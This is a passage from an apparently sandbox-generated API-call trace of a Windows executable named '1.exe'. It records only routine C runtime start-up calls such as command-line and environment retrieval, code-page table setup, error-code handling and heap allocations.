(uNumber=0x20) returned 0x20 [0034.811] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\1.exe\"" [0034.811] GetEnvironmentStringsW () returned 0xe95318* [0034.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1379, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1379 [0034.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x563) returned 0x2af0fd0 [0034.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1379, lpMultiByteStr=0x2af0fd0, cbMultiByte=1379, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1379 [0034.811] FreeEnvironmentStringsW (penv=0xe95318) returned 1 [0034.811] GetLastError () returned 0x0 [0034.811] SetLastError (dwErrCode=0x0) [0034.811] GetLastError () returned 0x0 [0034.811] SetLastError (dwErrCode=0x0) [0034.811] GetLastError () returned 0x0 [0034.812] SetLastError (dwErrCode=0x0) [0034.812] GetACP () returned 0x4e4 [0034.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x220) returned 0x2af1540 [0034.812] GetLastError () returned 0x0 [0034.812] SetLastError (dwErrCode=0x0) [0034.812] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.812] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcff6cc | out: lpCPInfo=0xcff6cc) returned 1 [0034.812] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcff198 | out: lpCPInfo=0xcff198) returned 1 [0034.812] GetLastError () returned 0x0 [0034.812] SetLastError (dwErrCode=0x0) [0034.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcff5ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcff5ac, cbMultiByte=256, lpWideCharStr=0xcfef18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鵧\x9bĀ") returned 256 [0034.812] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鵧\x9bĀ", cchSrc=256, lpCharType=0xcff1ac | out: lpCharType=0xcff1ac) returned 1 [0034.812] GetLastError () returned 0x0 [0034.812] SetLastError (dwErrCode=0x0) [0034.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcff5ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcff5ac, cbMultiByte=256, lpWideCharStr=0xcfeee8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.812] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.812] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0xcfecd8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0034.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0xcff4ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x07\xee\x97\x8c\xe4\xf6\xcf", lpUsedDefaultChar=0x0) returned 256 [0034.812] GetLastError () returned 0x0 [0034.812] SetLastError (dwErrCode=0x0) [0034.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcff5ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcff5ac, cbMultiByte=256, lpWideCharStr=0xcfef08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.812] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.812] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0xcfecf8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0034.812] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0xcff3ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x07\xee\x97\x8c\xe4\xf6\xcf", lpUsedDefaultChar=0x0) returned 256 [0034.812] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x9bf728, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0034.812] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.813] SetLastError (dwErrCode=0x0) [0034.813] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.814] GetLastError () returned 0x0 [0034.814] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2af1768 [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.815] GetLastError () returned 0x0 [0034.815] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.816] SetLastError (dwErrCode=0x0) [0034.816] GetLastError () returned 0x0 [0034.817] SetLastError (dwErrCode=0x0) [0034.817] GetLastError () returned 0x0 [0034.817] SetLastError (dwErrCode=0x0) [0034.817] GetLastError () returned 0x0 [0034.817] SetLastError (dwErrCode=0x0) [0034.817] GetLastError () returned 0x0 [0034.817] SetLastError (dwErrCode=0x0) [0034.817] GetLastError () returned 0x0 [0034.817] SetLastError (dwErrCode=0x0) [0034.817] GetLastError () returned 0x0 [0034.817] SetLastError (dwErrCode=0x0) [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x94) returned 0x2af1798 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1f) returned 0x2af1838 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x28) returned 0x2af1860 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x37) returned 0x2af1890 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x3c) returned 0x2af18d0 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x31) returned 0x2af1918 [0034.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x14) returned 0x2af1958 